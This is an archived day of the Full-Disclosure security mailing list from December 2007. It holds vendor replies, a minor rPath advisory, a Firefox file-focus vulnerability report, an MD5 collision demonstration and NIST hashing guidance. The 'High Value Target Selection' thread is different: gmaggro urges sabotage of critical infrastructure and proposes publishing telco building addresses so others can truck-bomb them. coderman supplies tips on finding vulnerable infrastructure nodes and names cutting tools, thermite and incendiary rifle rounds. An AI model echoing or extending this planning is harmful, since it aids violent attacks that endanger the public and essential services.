From prb at lava.net  Sat Dec  1 02:42:44 2007
From: prb at lava.net (Peter Besenbruch)
Date: Fri, 30 Nov 2007 16:42:44 -1000
Subject: [Full-disclosure] High Value Target Selection
In-Reply-To: <47505E42.90503@rogers.com>
References: <47505E42.90503@rogers.com>
Message-ID: <200711301642.44111.prb@lava.net>

On Friday 30 November 2007 09:02:26 gmaggro wrote:
> I think it'd be interesting if we started a discussion on the selection
> of high value targets to be used in the staging of attacks that damage
> significant infrastructure. The end goals, ranked equal in importance,
> would be as follows:

[big snip]

So, you wanted to send a little Christmas present to the NSA folks monitoring 
the Internet backbone? Make their unutterably boring lives a little 
more "interesting?"

We live in "interesting" times (not a good thing). I was over at the Mycroft 
site, and noticed that there was a Firefox search extension for Scroogle that 
uses encryption. There was another encrypted search tool for Wikipedia.

http://mycroft.mozdev.org/download.html?name=scroogle&sherlock=yes&opensearch=yes&submitform=Search
http://mycroft.mozdev.org/download.html?name=secure+wikipedia&sherlock=yes&opensearch=yes&submitform=Search

-- 
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky



From coderman at gmail.com  Sat Dec  1 05:27:34 2007
From: coderman at gmail.com (coderman)
Date: Fri, 30 Nov 2007 21:27:34 -0800
Subject: [Full-disclosure] High Value Target Selection
In-Reply-To: <47505E42.90503@rogers.com>
References: <47505E42.90503@rogers.com>
Message-ID: <4ef5fec60711302127i3e7baef0vf055d8a6592a5ee7@mail.gmail.com>

On Nov 30, 2007 11:02 AM, gmaggro <gmaggro at rogers.com> wrote:
> I think it'd be interesting if we started a discussion on the selection
> of high value targets

translation: let's discuss how to discern high degree and/or vulnerable
nodes in critical infrastructure networks.


> 1. To bring like minded people together while operating under the
> strategy of 'leaderless resistance'
> (http://en.wikipedia.org/wiki/Leaderless_resistance)

*yawn*


> 2. To be the 'aboveground' partner to the 'underground' scene, or at
> least serve to distract authorities from the activities of underground
> groups

... ZZzzzzZZZ ... you're losing me, jim.


> 3. To see exactly what can be accomplished, and accomplish it

pretty easy to make inferences once you've mapped out the critical
infrastructure in question.  this is of course a little more difficult now
given the mostly inept attempts to reign in useful information on such
infrastructure.  (the easy days of pulling up fiber plats via county/gov
websites is long gone...)

as for actual attacks, you'll be biting the hand that feeds...
(i'll wait for that decentralized wireless mesh net before slicing
those glassy life lines, thanks)


> 4. To capture the imagination of the public

more like hatred.

the unwashed masses get all restless and cranky when:
a) the 'tubes are clogged or dead
b) phone lines to anywhere outside town are down.
c) all credit / debit transactions are dead - cash only?
d) some/most cable programming is tits up
e) travel and/or fuel is highly constrained / unavailable
f) electricity is spotty or unavailable


> Capturing the imagination of the public sounds like bizspeek bullshit,

this i fully agree with.  thanks for that...


> So, types of infrastructure to attack:
> [ list of infrastructure domains as if they exist as discrete units
     independent of each other... lolz! ]

rarely is one affected in isolation.  the ugly truth about critical
infrastructure
is that those high degree, critical nodes start impacting multiple domains
at once when affected by outages or targeted attack.


> [lots of blah blah blah misunderstanding of what critical infrastructure
>  is and how it is organized, USA bashing, etc...]

first, go read Global Guerrillas.  that will keep you busy for a few weeks
and save us all more of this blather:
 http://globalguerrillas.typepad.com/globalguerrillas/

second, some attacking critical infrastructure clif notes:

1. those with clue have realized the folly of trying to make infallible
   infrastructure.  their focus has shifted to rapid repair instead of
   prevention.  there are papers written that describe exactly how
   stupid it is to think you can build resilient infrastructure in the face
   of a skilled attacker.
   (see the ATT telco in a trailer truck, etc)

2. critical infrastructure viewed as a graph theory problem highlights
   the compound vulnerabilities across multiple infrastructures inherent
   in high degree / high value nodes of critical infrastucture.
   (metropolitan bridges carrying fiber, gas, electricity, vehicles, etc
    over the same physical span, etc.)

3. most critical infrastructure is resilient against planned / common
   failure scenarios, and these protections actually create hyper-
   sensitive vulnerabilities against targeted / unplanned attacks.
   (M of N redundancy that leads to catastrophic failure against
    well targeted M attacks, etc.)

combining these aspects into attack scenarios is left as an
exercise for the reader [who pines for a vacation in club fed...]

the crux of the problem for the practical attacker is discerning the nature
and location of critical infrastructure nodes and links.  fortunately for the
determined individual this is merely a matter of effort and time, not a
question of ability.  for the rest of us this means our life style / way of life
is highly dependent on the lack of sufficiently skilled malcontents able and
willing to express their grievances in direct action against such systems.

perhaps this can be viewed as a check against the fascist dystopia many
fear as the end result of authoritarian abuse of power coupled with high
tech tools for manipulation and control of the populace...

best regards,


p.s. my favorite tools in such scenarios (of course not advocation):

- the thermic lance
- portable saws (lithium battery cells quite power dense now)
- post hole diggers
- thermite flower pots (lol, so much fun!)
- software defined / police band and EM svcs capable radios
- bolt action .50 BMG (incendiary DU rounds++)



From James.Williams at ca.com  Sat Dec  1 08:37:50 2007
From: James.Williams at ca.com (Williams, James K)
Date: Sat, 1 Dec 2007 03:37:50 -0500
Subject: [Full-disclosure] ZDI-07-069: CA BrightStor ARCserve Backup
	Message Engine Insecure Method Exposure Vulnerability
Message-ID: <649CDCB56C88AA458EFF2CBF494B620403F6ABE1@USILMS12.ca.com>


> Date: Wed, 28 Nov 2007 03:32:51 +0000
> From: cocoruder. <frankruder at hotmail.com>
> Subject: Re: [Full-disclosure] ZDI-07-069: CA BrightStor 
>           ARCserve Backup Message Engine Insecure Method Expos
> To: <full-disclosure at lists.grok.org.uk>, <bugtraq at securityfocus.com>
>
> it is so amazing that the vendor's advisory has been released 
> more than one month ago, (see my advisory of a similar vul at 
> http://ruder.cdut.net/blogview.asp?logID=221), and another thing 
> is that I have tested my reported vul again after CA's patch 
> released one month ago, but in fact they have not fixed it!! I 
> report it again to CA but there is no response, I guess CA is 
> making an international joke with us:), or because this product 
> is sooooooooo bad that they will not support it any more?  
> welcome to my blog:http://ruder.cdut.net

cocoruder,

We have not received any email from frankruder at hotmail, but we did 
receive an email about this issue from hfli at fortinet on 
2007-10-15.  We responded to that email on 2007-10-15.

FYI, we are currently wrapping up QA on new patches, and we have 
contacted hfli at fortinet with details.

Regards,
Ken
                                                           
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research


From slythers at gmail.com  Sat Dec  1 10:27:58 2007
From: slythers at gmail.com (Slythers Bro)
Date: Sat, 1 Dec 2007 11:27:58 +0100
Subject: [Full-disclosure] PlayStation 3 predicts next US president (fwd)
In-Reply-To: <Pine.NEB.4.64.0711301548270.29916@panix5.panix.com>
References: <Pine.NEB.4.64.0711301548270.29916@panix5.panix.com>
Message-ID: <8f6a58a30712010227g18b52062k3a7e567871aedb5e@mail.gmail.com>

is it real ?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071201/6f79c342/attachment.html 

From majormal at pirate-radio.org  Sat Dec  1 10:25:31 2007
From: majormal at pirate-radio.org (Major Malfunction)
Date: Sat, 01 Dec 2007 10:25:31 +0000
Subject: [Full-disclosure] DC4420 - London DEFCON chapter Christmas Party -
	11th December
Message-ID: <4751369B.9060307@pirate-radio.org>

hi all,

you are cordially invited to the final DC4420 meet of 2007, which will 
be held on Tuesday the 11th December, at the usual location - Charing 
Cross Sports Club, Charing Cross Hospital:

http://www.multimap.com/map/browse.cgi?lat=51.4857&lon=-0.2194&scale=5000&icon=x

more info here:

   http://dc4420.org

we have the bar to ourselves and there will be no particular agenda 
other than drinking the place dry, eating good food and socialising, but 
we will definitely also be celebrating Alien's continued presence on our 
home planet after his near miss with the man in the black cloak!

all are welcome... "fight club" speaking rules are suspended for the 
evening, so bring a friend or two and make this a party to remember!

cheers,
MM
-- 
"In DEFCON, we have no names..." errr... well, we do... but silly ones...



From isbackgobbles at googlemail.com  Sat Dec  1 12:55:12 2007
From: isbackgobbles at googlemail.com (Gobbles is back)
Date: Sat, 1 Dec 2007 12:55:12 +0000
Subject: [Full-disclosure] Phioust gets all emotional to gobbles and friends
	...
Message-ID: <679de8620712010455qc29a263p8c571ecca24de6df@mail.gmail.com>

Phioust means business with his real name and all those philosopher (HAAAA),
CISSP and MCSE (lol) degrees ... see for urself in his dangerously sexy
email ... in response to our spam threat :)

---------- Forwarded message ----------
From: phioust <phioust at gmail.com>
Date: Nov 30, 2007 9:33 PM
Subject: spam?
To: isbackgobbles at googlemail.com

i suggest you do not make anymore threats, belive me, i have lots of
contacts to track you down ..

-- 
Lionel Phioust

Phd, CISSP, MCSE


ohhhh f33r the b33r, he owns 100 TOR nodes, 10000 wireless hotspots and one
lesbian gmail server admin to track our IP's .. wuuuuu !!!!

Spammers - We got Phiousts real name for yaall, self pat on the back for
good work. ohhh wait wait .. lets make him a bit more jobless by the oath of
google

Lionel Phioust, security, exploits, bugtraq, scriptkiddie, lamer, idiot,
bisexual, Phioust. ROFL


Note - Some of our concerned fans suspect us not to be gobbles. I will save
all those online forensic retards the time to analyse our emails and come
straight to the point .. in w00w00 style .. 10 europeans, 15 asians, 11
americans and one hell of a funny little turkey .. 5 member required to not
f33r w00w00 might .. and no .. Shok dont look like Marilyn Mansons gimp boy
!!! .. well the gimp suite was stiched by us ..
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071201/8ed82fde/attachment.html 

From kristian.hermansen at gmail.com  Sat Dec  1 13:06:36 2007
From: kristian.hermansen at gmail.com (Kristian Erik Hermansen)
Date: Sat, 1 Dec 2007 05:06:36 -0800
Subject: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
Message-ID: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>

I know of many commercial security products which still utilize MD5 to
prove integrity of the data they distribute to customers.  This should
no longer be considered appropriate.  Now that tools are readily
available to exploit newer MD5 collision research, I think it is safe
to say that the public should retire its usage for good.


Read the most recent research regarding chosen-prefix collisions:
http://www.win.tue.nl/hashclash/EC07v2.0.pdf


A concrete example for your perusal:
khermans at khermans-laptop:/tmp$ wget
http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe
--04:36:32--  http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe
           => `HelloWorld-colliding.exe'
Resolving www.win.tue.nl... 131.155.70.190
Connecting to www.win.tue.nl|131.155.70.190|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41,792 (41K) [application/octet-stream]

100%[====================================>] 41,792       109.16K/s

04:36:33 (108.92 KB/s) - `HelloWorld-colliding.exe' saved [41792/41792]

khermans at khermans-laptop:/tmp$ wget
http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe
--04:36:37--  http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe
           => `GoodbyeWorld-colliding.exe'
Resolving www.win.tue.nl... 131.155.70.190
Connecting to www.win.tue.nl|131.155.70.190|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41,792 (41K) [application/octet-stream]

100%[====================================>] 41,792       127.20K/s

04:36:38 (126.82 KB/s) - `GoodbyeWorld-colliding.exe' saved [41792/41792]

khermans at khermans-laptop:/tmp$ ls -lsha *.exe
44K -rw-r--r-- 1 khermans khermans 41K 2007-11-23 01:08
GoodbyeWorld-colliding.exe
44K -rw-r--r-- 1 khermans khermans 41K 2007-11-23 01:08 HelloWorld-colliding.exe
khermans at khermans-laptop:/tmp$ strings HelloWorld-colliding.exe | tail
SetFilePointer
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
SetStdHandle
CloseHandle
KERNEL32.dll
Hello World ;-)
khermans at khermans-laptop:/tmp$ strings GoodbyeWorld-colliding.exe | tail
SetFilePointer
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
SetStdHandle
CloseHandle
KERNEL32.dll
Goodbye World :-(
khermans at khermans-laptop:/tmp$ md5sum HelloWorld-colliding.exe | awk
'{print $1}' | tee hw
18fcc4334f44fed60718e7dacd82dddf
khermans at khermans-laptop:/tmp$ md5sum GoodbyeWorld-colliding.exe | awk
'{print $1}' | tee gw
18fcc4334f44fed60718e7dacd82dddf
khermans at khermans-laptop:/tmp$ cmp hw gw
khermans at khermans-laptop:/tmp$ echo $?
0


There you have it.  Surely a GPL'd tool implementing this attack style
will be available shortly.  And since Chinese researchers have been
attacking SHA-1 lately, should SHA-256 be considered the proper
replacement?  I am unsure :-(
-- 
Kristian Erik Hermansen
"I have no special talent. I am only passionately curious."



From hardwick.carl at gmail.com  Sat Dec  1 13:48:35 2007
From: hardwick.carl at gmail.com (carl hardwick)
Date: Sat, 1 Dec 2007 14:48:35 +0100
Subject: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing vulnerability
Message-ID: <bc7e11f20712010548t240f240av50299838834e6a88@mail.gmail.com>

Firefox 2.0.0.11 File Focus Stealing vulnerability:

Sorry Mozilla, but the recent file focus fix was not enough. I think
Mozilla made another mistake while fixing the previous file/label
issue. Because now I embed a file field and a textfield inside one
label. When this happens, and you type only one time in the textfield,
the focus travels to the file field and the value travels with it.
Back to the drawing board I would say. I only got it to work in
Firefox, Gareth checked Safari for me, and it also works in Safari. I
guess this type of exploit could function on other HTML objects as
well, and could be very dangerous because it only requires a one time
focus in a textfield.

PoC here:
http://carl-hardwick.googlegroups.com/web/Firefox20011StealFocusFlaw.htm



From steven at securityzone.org  Sat Dec  1 15:20:53 2007
From: steven at securityzone.org (Steven Adair)
Date: Sat, 1 Dec 2007 10:20:53 -0500 (EST)
Subject: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
In-Reply-To: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
References: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
Message-ID: <26439.65.88.218.157.1196522453.squirrel@slashmail.org>

>
>
> There you have it.  Surely a GPL'd tool implementing this attack style
> will be available shortly.  And since Chinese researchers have been
> attacking SHA-1 lately, should SHA-256 be considered the proper
> replacement?  I am unsure :-(

Yes, it would probably be a good idea.  I think this link has been put out
on this list in the past with respect to discussion on SHA-1:

http://csrc.nist.gov/groups/ST/toolkit/secure_hashing.html

NIST might not be the bible to you on what to follow and implement, but
they are definitely worth listening to (even if you're not a U.S. Federal
agency) when they tell you not to use something anymore.  For those that
don't want to click and just want to read, here's the relevant parts:

----

March 15, 2006: The SHA-2 family of hash functions (i.e., SHA-224,
SHA-256, SHA-384 and SHA-512) may be used by Federal agencies for all
applications using secure hash algorithms. Federal agencies should stop
using SHA-1 for digital signatures, digital time stamping and other
applications that require collision resistance as soon as practical, and
must use the SHA-2 family of hash functions for these applications after
2010. After 2010, Federal agencies may use SHA-1 only for the following
applications: hash-based message authentication codes (HMACs); key
derivation functions (KDFs); and random number generators (RNGs).
Regardless of use, NIST encourages application and protocol designers to
use the SHA-2 family of hash functions for all new applications and
protocols.

----

Steven
http://www.securityzone.org

> --
> Kristian Erik Hermansen
> "I have no special talent. I am only passionately curious."
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>




From juha-matti.laurio at netti.fi  Sat Dec  1 15:24:56 2007
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Sat, 1 Dec 2007 17:24:56 +0200 (EET)
Subject: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing
 vulnerability
Message-ID: <1200694.87911196522696390.JavaMail.juha-matti.laurio@netti.fi>

Netscape Navigator version 9.0.0.4 is affected too. Test done with PoC-type URL mentioned on Mac OS X 10.4.10 fully patched.
Vendor was contacted on 1st Dec 2007.

- Juha-Matti

carl hardwick <hardwick.carl at gmail.com> wrote: 
> Firefox 2.0.0.11 File Focus Stealing vulnerability:
> 
> Sorry Mozilla, but the recent file focus fix was not enough. I think
> Mozilla made another mistake while fixing the previous file/label
> issue. Because now I embed a file field and a textfield inside one
> label. When this happens, and you type only one time in the textfield,
> the focus travels to the file field and the value travels with it.
> Back to the drawing board I would say. I only got it to work in
> Firefox, Gareth checked Safari for me, and it also works in Safari. I
> guess this type of exploit could function on other HTML objects as
> well, and could be very dangerous because it only requires a one time
> focus in a textfield.
> 
> PoC here:
> http://carl-hardwick.googlegroups.com/web/Firefox20011StealFocusFlaw.htm
> 



From announce-noreply at rpath.com  Sat Dec  1 03:54:22 2007
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Fri, 30 Nov 2007 22:54:22 -0500
Subject: [Full-disclosure] rPSA-2007-0255-1 nss_ldap
Message-ID: <4750daee.wSL5wQCJa3g/Dx8V%announce-noreply@rpath.com>

rPath Security Advisory: 2007-0255-1
Published: 2007-11-30
Products:
    rPath Linux 1

Rating: Minor
Exposure Level Classification:
    Local Weakness
Updated Versions:
    nss_ldap=conary.rpath.com at rpl:1/239-9.2-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-1913

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794

Description:
    Previous versions of the nss_ldap package contain a race condition that
    can cause nss_ldap to return incorrect data to requesting processes.

http://wiki.rpath.com/Advisories:rPSA-2007-0255

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



From prandal at herefordshire.gov.uk  Sat Dec  1 15:58:37 2007
From: prandal at herefordshire.gov.uk (Randal, Phil)
Date: Sat, 1 Dec 2007 15:58:37 -0000
Subject: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing
	vulnerability
In-Reply-To: <1200694.87911196522696390.JavaMail.juha-matti.laurio@netti.fi>
References: <1200694.87911196522696390.JavaMail.juha-matti.laurio@netti.fi>
Message-ID: <7EF0EE5CB3B263488C8C18823239BEBA03CF3B@HC-MBX02.herefordshire.gov.uk>


 And the Mozilla bugzilla number is?


-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of
Juha-Matti Laurio
Sent: 01 December 2007 15:25
To: carl hardwick; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing
vulnerability

Netscape Navigator version 9.0.0.4 is affected too. Test done with
PoC-type URL mentioned on Mac OS X 10.4.10 fully patched.
Vendor was contacted on 1st Dec 2007.

- Juha-Matti

carl hardwick <hardwick.carl at gmail.com> wrote: 
> Firefox 2.0.0.11 File Focus Stealing vulnerability:
> 
> Sorry Mozilla, but the recent file focus fix was not enough. I think 
> Mozilla made another mistake while fixing the previous file/label 
> issue. Because now I embed a file field and a textfield inside one 
> label. When this happens, and you type only one time in the textfield,

> the focus travels to the file field and the value travels with it.
> Back to the drawing board I would say. I only got it to work in 
> Firefox, Gareth checked Safari for me, and it also works in Safari. I 
> guess this type of exploit could function on other HTML objects as 
> well, and could be very dangerous because it only requires a one time 
> focus in a textfield.
> 
> PoC here:
> http://carl-hardwick.googlegroups.com/web/Firefox20011StealFocusFlaw.h
> tm
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



From gmaggro at rogers.com  Sat Dec  1 16:09:55 2007
From: gmaggro at rogers.com (gmaggro)
Date: Sat, 01 Dec 2007 11:09:55 -0500
Subject: [Full-disclosure] High Value Target Selection
In-Reply-To: <4ef5fec60711302127i3e7baef0vf055d8a6592a5ee7@mail.gmail.com>
References: <47505E42.90503@rogers.com>
	<4ef5fec60711302127i3e7baef0vf055d8a6592a5ee7@mail.gmail.com>
Message-ID: <47518753.9030006@rogers.com>

> translation: let's discuss how to discern high degree and/or vulnerable
> nodes in critical infrastructure networks.

Correct.

>> 1. To bring like minded people together while operating under the
>> strategy of 'leaderless resistance'
>> (http://en.wikipedia.org/wiki/Leaderless_resistance)
>
> *yawn*

Apologies, but there's some people that haven't heard of the idea. Not
everyone here is from a western country, or wastes their time combing
for what might be perceived as 'out there' literature like ELF or SHAC
stuff.

>> 2. To be the 'aboveground' partner to the 'underground' scene, or at
>> least serve to distract authorities from the activities of underground
>> groups
> 
> ... ZZzzzzZZZ ... you're losing me, jim.

If we wind up not being to do anything useful, then at least run
interference for the real subversives. Keep our friends in intel and law
enforcement busy chasing dead ends. Lower the signal-to-noise ratio and
make them have to spend as much money as possible. Tarpit them.

>> 4. To capture the imagination of the public
> 
> more like hatred.

What exactly is the difference? :)


>> So, types of infrastructure to attack:
>> [ list of infrastructure domains as if they exist as discrete units
>      independent of each other... lolz! ]

Well, what was one to do - just put "1. The Internet"? No, the domains
were split up for the matter of discussion. Of course with networks any
divisions are arbitrary. But given the large area to attack, some
focusing of effort will be required, at least at first.

>> [lots of blah blah blah misunderstanding of what critical infrastructure
>>  is and how it is organized, USA bashing, etc...]

Please elaborate on your perceptions of my failure to adequately define
'critical infrastructure'.

As for USA bashing, meh. It's just that they make a great target and
they got lots of enemies. If I was Irish, maybe I'd have picked England,
and if I was Chechen, maybe I'd pick Russia. Not important.


> first, go read Global Guerrillas.  that will keep you busy for a few weeks
> and save us all more of this blather:
>  http://globalguerrillas.typepad.com/globalguerrillas/

Thanks for the link, I'll check it out.

> second, some attacking critical infrastructure clif notes:
> 
> 1. those with clue have realized the folly of trying to make infallible
>    infrastructure.  their focus has shifted to rapid repair instead of
>    prevention.  there are papers written that describe exactly how
>    stupid it is to think you can build resilient infrastructure in the face
>    of a skilled attacker.
>    (see the ATT telco in a trailer truck, etc)
> 
> 2. critical infrastructure viewed as a graph theory problem highlights
>    the compound vulnerabilities across multiple infrastructures inherent
>    in high degree / high value nodes of critical infrastucture.
>    (metropolitan bridges carrying fiber, gas, electricity, vehicles, etc
>     over the same physical span, etc.)
> 
> 3. most critical infrastructure is resilient against planned / common
>    failure scenarios, and these protections actually create hyper-
>    sensitive vulnerabilities against targeted / unplanned attacks.
>    (M of N redundancy that leads to catastrophic failure against
>     well targeted M attacks, etc.)

Good stuff. But wouldn't you have already surprised yourself vis-a-vis
your first  point? 'those with clue' are smaller than we'd like.
Sloppiness abounds; I am certain of that.

> combining these aspects into attack scenarios is left as an
> exercise for the reader [who pines for a vacation in club fed...]

Well that depends on the exact nature of any alleged or purported crime,
and whatever extradition treaties between the nation-state someone
resides in and the USA. They also have to catch you first.

> the crux of the problem for the practical attacker is discerning the nature
> and location of critical infrastructure nodes and links.  fortunately for the
> determined individual this is merely a matter of effort and time, not a
> question of ability.  for the rest of us this means our life style / way of life
> is highly dependent on the lack of sufficiently skilled malcontents able and
> willing to express their grievances in direct action against such systems.

A good summary, thank you. So I suppose I'm saying "Hey malcontents, if
we can't go more public let's start sharing info and making it
incredibly easy for other malcontents".

And would people, for once, consider that maybe the net was adopted too
damn fast by too many morons in too slap-dash a fashion? I never thought
I'd find myself arguing for a conservative approach in, well, anything.
But people really need to start doing a better job as it's affecting too
many people. Since that's not likely to happen..

> perhaps this can be viewed as a check against the fascist dystopia many
> fear as the end result of authoritarian abuse of power coupled with high
> tech tools for manipulation and control of the populace...

> p.s. my favorite tools in such scenarios (of course not advocation):
> - the thermic lance
> - portable saws (lithium battery cells quite power dense now)
> - post hole diggers
> - thermite flower pots (lol, so much fun!)
> - software defined / police band and EM svcs capable radios
> - bolt action .50 BMG (incendiary DU rounds++)

Why not advocate? If you did get in trouble for this post, I don't think
adding a caveat like "of course not advocation" would help you much, if
at all. Like those quips in Phrack or Paladin Press books "For
educational purposes only". Bwahahaha!

Really, how much trouble could we get in if we posted up a list of
street addresses, each address being a building that contained
significant telco and/or routing infrastructure? Especially if the next
week, a bunch of completely unrelated people park Oklahoma Specials out
front of said buildings and blow them up.

I know where those locations are for my city, and I'm sure others know
where those are for their cities. I say, let's post them up, make alot
of people nervous, and see what happens.

Additional thoughts:

Probably be some interesting/useful information poking around BGP land
and looking at ASs and their relationships in more detail. Especially
when cross-referenced to actual physical locations.

Interesting maps:

http://chrisharrison.net/projects/InternetMap/high/worlddotblack.png
http://chrisharrison.net/projects/InternetMap/high/worldBlack.png
http://chrisharrison.net/projects/InternetMap/high/euroblack.png
http://chrisharrison.net/projects/InternetMap/high/NorthAmericaBlack.png

http://www.isi.edu/ant/address/
http://xkcd.com/195/



From gmaggro at rogers.com  Sat Dec  1 16:49:08 2007
From: gmaggro at rogers.com (gmaggro)
Date: Sat, 01 Dec 2007 11:49:08 -0500
Subject: [Full-disclosure] High Value Target Selection
In-Reply-To: <4ef5fec60711302127i3e7baef0vf055d8a6592a5ee7@mail.gmail.com>
References: <47505E42.90503@rogers.com>
	<4ef5fec60711302127i3e7baef0vf055d8a6592a5ee7@mail.gmail.com>
Message-ID: <47519084.4040108@rogers.com>

Forgot to tack these onto the last post. The wikipedia entry
http://en.wikipedia.org/wiki/Submarine_communications_cable has some
amusing links in it's reference section:

http://www.telegeography.com/products/map_cable/images/sub_cable_2007_large.jpg
http://www1.alcatel-lucent.com/submarine/refs/World_Map_LR.pdf
http://www.kddi.com/english/business/oversea/pdf/kddi_gnm_en.pdf
http://www.kidorf.com/DBLandings.php

And a list of the cable laying ships. Does that equate to cable repairships?

http://www.iscpc.org/information/Cableships_Page.htm

Apologies for the noise.




From nate.mcfeters at gmail.com  Sat Dec  1 17:37:29 2007
From: nate.mcfeters at gmail.com (Nate McFeters)
Date: Sat, 1 Dec 2007 12:37:29 -0500
Subject: [Full-disclosure] Firefox 2.0.0.11 File Focus Stealing
	vulnerability
In-Reply-To: <1200694.87911196522696390.JavaMail.juha-matti.laurio@netti.fi>
References: <1200694.87911196522696390.JavaMail.juha-matti.laurio@netti.fi>
Message-ID: <997ef2c20712010937q1cc66354w78ac71761b31f1a0@mail.gmail.com>

More than likely all the gecko based browsers will be vulnerable to this.
So that would include Mozilla, Camino, SeaMonkey... possibly even things
like Thunderbird if you could get it to render.

Nice find guys!

Nate

On 12/1/07, Juha-Matti Laurio <juha-matti.laurio at netti.fi> wrote:
>
> Netscape Navigator version 9.0.0.4 is affected too. Test done with
> PoC-type URL mentioned on Mac OS X 10.4.10 fully patched.
> Vendor was contacted on 1st Dec 2007.
>
> - Juha-Matti
>
> carl hardwick <hardwick.carl at gmail.com> wrote:
> > Firefox 2.0.0.11 File Focus Stealing vulnerability:
> >
> > Sorry Mozilla, but the recent file focus fix was not enough. I think
> > Mozilla made another mistake while fixing the previous file/label
> > issue. Because now I embed a file field and a textfield inside one
> > label. When this happens, and you type only one time in the textfield,
> > the focus travels to the file field and the value travels with it.
> > Back to the drawing board I would say. I only got it to work in
> > Firefox, Gareth checked Safari for me, and it also works in Safari. I
> > guess this type of exploit could function on other HTML objects as
> > well, and could be very dangerous because it only requires a one time
> > focus in a textfield.
> >
> > PoC here:
> > http://carl-hardwick.googlegroups.com/web/Firefox20011StealFocusFlaw.htm
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071201/81cebd51/attachment.html 

From nytrokiss at gmail.com  Sat Dec  1 17:39:56 2007
From: nytrokiss at gmail.com (James Matthews)
Date: Sat, 1 Dec 2007 18:39:56 +0100
Subject: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
In-Reply-To: <26439.65.88.218.157.1196522453.squirrel@slashmail.org>
References: <fe37588d0712010506h192a2374uba72a0d3b5153b77@mail.gmail.com>
	<26439.65.88.218.157.1196522453.squirrel@slashmail.org>
Message-ID: <8a6b8e350712010939g1fee081eqd7815ba53a594b25@mail.gmail.com>

I agree! It should be changed and i have no idea why people still use it!

On Dec 1, 2007 4:20 PM, Steven Adair <steven at securityzone.org> wrote:

> >
> >
> > There you have it.  Surely a GPL'd tool implementing this attack style
> > will be available shortly.  And since Chinese researchers have been
> > attacking SHA-1 lately, should SHA-256 be considered the proper
> > replacement?  I am unsure :-(
>
> Yes, it would probably be a good idea.  I think this link has been put out
> on this list in the past with respect to discussion on SHA-1:
>
> http://csrc.nist.gov/groups/ST/toolkit/secure_hashing.html
>
> NIST might not be the bible to you on what to follow and implement, but
> they are definitely worth listening to (even if you're not a U.S. Federal
> agency) when they tell you not to use something anymore.  For those that
> don't want to click and just want to read, here's the relevant parts:
>
> ----
>
> March 15, 2006: The SHA-2 family of hash functions (i.e., SHA-224,
> SHA-256, SHA-384 and SHA-512) may be used by Federal agencies for all
> applications using secure hash algorithms. Federal agencies should stop
> using SHA-1 for digital signatures, digital time stamping and other
> applications that require collision resistance as soon as practical, and
> must use the SHA-2 family of hash functions for these applications after
> 2010. After 2010, Federal agencies may use SHA-1 only for the following
> applications: hash-based message authentication codes (HMACs); key
> derivation functions (KDFs); and random number generators (RNGs).
> Regardless of use, NIST encourages application and protocol designers to
> use the SHA-2 family of hash functions for all new applications and
> protocols.
>
> ----
>
> Steven
> http://www.securityzone.org
>
> > --
> > Kristian Erik Hermansen
> > "I have no special talent. I am only passionately curious."
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
http://search.goldwatches.com/?Search=Movado+Watches
http://www.jewelerslounge.com
http://www.goldwatches.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20071201/46c508bd/attachment.html 

From erey at ernw.de  Sat Dec  1 17:51:47 2007
From: erey at ernw.de (Enno Rey)
Date: Sat, 1 Dec 2007 18:51:47 +0100
Subject: [Full-disclosure] MD5 algorithm considered toxic (and harmful)
